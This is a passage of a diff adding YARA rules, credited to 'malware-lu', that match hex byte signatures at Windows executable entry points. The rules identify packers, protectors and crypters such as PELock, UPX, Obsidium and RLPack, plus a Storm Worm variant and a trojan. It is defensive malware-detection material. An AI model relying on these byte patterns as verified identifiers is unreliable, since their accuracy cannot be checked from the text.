+		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 03 CD 20 EB EB 03 CD 20 03 61 9D 83 C4 04 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv203
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe220221byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 7D 12 00 00 A3 A0 44 40 00 E8 79 12 00 00 6A 0A 50 6A 00 FF 35 A0 44 40 00 E8 0F 00 00 00 50 E8 69 12 00 00 CC CC CC CC CC CC CC CC CC 68 2C 02 00 00 68 00 00 00 00 68 B0 44 40 00 E8 3A 12 00 00 83 C4 0C 8B 44 24 04 A3 B8 44 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 32 12 00 00 A3 B0 44 40 00 68 F4 01 00 00 68 BC 44 40 00 FF 35 B8 44 40 00 E8 1E 12 00 00 B8 BC 44 40 00 89 C1 8A 30 40 80 FE 5C 75 02 89 C1 80 FE 00 75 F1 C6 01 00 E8 EC 18 00 00 E8 28 16 00 00 E8 4A 12 00 00 68 00 FA 00 00 68 08 00 00 00 FF 35 B0 44 40 00 E8 E7 11 00 00 A3 B4 44 40 00 8B 15 D4 46 40 00 E8 65 0A 00 00 BB 00 00 10 00 B8 01 00 00 00 E8 72 0A 00 00 74 09 C7 00 01 00 00 00 83 C0 04 A3 D4 46 40 00 FF 35 B4 44 40 00 E8 26 05 00 00 8D 0D B8 46 40 00 5A E8 CF 0F 00 00 FF 35 B4 44 40 00 FF 35 B8 46 40 00 E8 EE 06 00 00 8D 0D B4 46 40 00 5A E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXFreakv01BorlandDelphiHMX0101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }
+	$a1 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Obsidium13017Obsidiumsoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite22c199899IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Enigmaprotector110unregistered
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 }
+	$a1 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 E9 51 0B C4 80 BC 7E 35 09 37 E7 C9 3D C9 45 C9 4D 74 92 BA E4 E9 24 6B DF 3E 0E 38 0C 49 10 27 80 51 A1 8E 3A A3 C8 AE 3B 1C 35 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Obsidium1341ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WebCopsDLLLINKDataSecurity
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PackMaster10PEXCloneAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 01 00 00 E8 83 C4 04 E8 01 90 90 90 E9 5D 81 ED D3 22 40 90 E8 04 02 90 90 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv037v038BetaStripbaserelocationtableOptionDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 }
+
+condition:
+		$a0
+}
+	
+	
+rule AHTeamEPProtector03fakeSVKP13xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 00 00 00 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallShieldCustom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 44 56 FF 15 ?? ?? 41 00 8B F0 85 F6 75 08 6A FF FF 15 ?? ?? 41 00 8A 06 57 8B 3D ?? ?? 41 00 3C 22 75 1B 56 FF D7 8B F0 8A 06 3C 22 74 04 84 C0 75 F1 80 3E 22 75 15 56 FF D7 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitevafterv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeToolsv21EncruptorbyDISMEMBER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ?? ?? 1E 8C DA 83 ?? ?? 8E DA 8E C2 BB ?? ?? BA ?? ?? 85 D2 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTkrnlSecureSuiteNTkrnlteam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinv0b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VXTibsZhelatinStormWormvariant
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 74 24 1C 58 8D 80 ?? ?? 77 04 50 68 62 34 35 04 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEX099emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED FF 22 40 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NSPack3xLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv25RetailBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANXiaoHui
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C E8 00 00 00 00 5D B8 ?? 85 40 00 2D ?? 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NFOv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PMODEWv112116121133DOSextender
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 16 07 BF ?? ?? 8B F7 57 B9 ?? ?? F3 A5 06 1E 07 1F 5F BE ?? ?? 06 0E A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AaseCrypterbysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 B8 A0 3E 00 10 E8 93 DE FF FF 68 F8 42 00 10 E8 79 DF FF FF 68 00 43 00 10 68 0C 43 00 10 E8 42 DF FF FF 50 E8 44 DF FF FF A3 98 66 00 10 83 3D 98 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 1C 43 00 10 6A 00 E8 4B DF FF FF 68 2C 43 00 10 68 0C 43 ?? ?? ?? ?? DF FF FF 50 E8 0E DF FF FF A3 94 66 00 10 83 3D 94 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 38 43 00 10 6A 00 E8 15 DF FF FF 68 48 43 00 10 68 0C 43 00 10 E8 D6 DE FF FF 50 E8 D8 DE FF FF A3 A0 66 00 10 83 3D A0 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 58 43 00 10 6A 00 E8 DF DE FF FF 68 6C 43 00 10 68 0C 43 00 10 E8 A0 DE FF FF 50 E8 A2 DE FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule aPackv098bJibz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 93 07 1F 05 ?? ?? 8E D0 BC ?? ?? EA }
+
+condition:
+		$a0
+}
+	
+	
+rule UPackv011Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 1C F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 03 B3 00 8D 1C 5B 8D 9C 9E 0C 10 00 00 B0 01 67 E3 29 8B D7 }
+
+condition:
+		$a0
+}
+	
+	
+rule NsPacKNetLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02PENightMare2BetaAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC60DebugVersionAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 90 90 90 01 01 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DJoinv07publicRC4encryptiondrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C6 05 ?? ?? 40 00 00 C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv103v104
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherV01Teraphy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtrPasswcheckVirshield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 C0 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeGuarderv18Exeiconcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D B2 04 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule codeCrypter031Tibbar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 53 5B 90 BB ?? ?? ?? 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPv073betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B DD E8 00 00 00 00 5D 95 32 C0 95 89 9D 80 00 00 00 B8 42 31 40 00 BB 41 30 40 00 2B C3 03 C5 33 D2 8A 10 40 B9 ?? ?? 00 00 8B F9 30 10 8A 10 40 49 75 F8 64 EF 86 3D 30 00 00 0F B9 FF 4B 89 52 5C 4C BD 77 C2 0C CE 88 4E 2D E8 00 00 00 5D 0D DB 5E 56 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEnguinCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorDLLv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 75 0C 8B 5D 10 83 FE 01 74 05 83 FE 02 75 12 53 56 FF 75 08 E8 6E FF FF FF 09 C0 75 04 31 C0 EB 21 53 56 FF 75 08 E8 ?? ?? ?? ?? 89 C7 09 F6 74 05 83 FE 03 75 0A 53 56 FF 75 08 E8 47 FF FF FF 89 F8 8D 65 F4 5F 5E 5B 5D C2 0C 00 C9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECrc32088ZhouJinYu
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED B6 A4 45 00 8D BD B0 A4 45 00 81 EF 82 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv123b3v1241
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Noodlecrypt2rsc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 76 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack120BasicEditionLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 9C 0C 00 00 EB 0C 8B 85 98 0C 00 00 89 85 9C 0C 00 00 8D B5 C4 0C 00 00 8D 9D 82 04 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 2D 0C 00 00 89 85 94 0C 00 00 E8 59 01 00 00 EB 20 60 8B 85 9C 0C 00 00 FF B5 94 0C 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PENightMare2BetaAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeXtremeProtector105FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5D 81 00 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicDLLLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyv5v6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev109a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }
+	$a1 = { EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PCryptv351
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 43 52 59 50 54 FF 76 33 2E 35 31 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2312Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 FF 15 ?? ?? ?? ?? E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Extractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 00 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 CD 09 00 00 89 85 14 0A 00 00 EB 14 60 FF B5 14 0A }
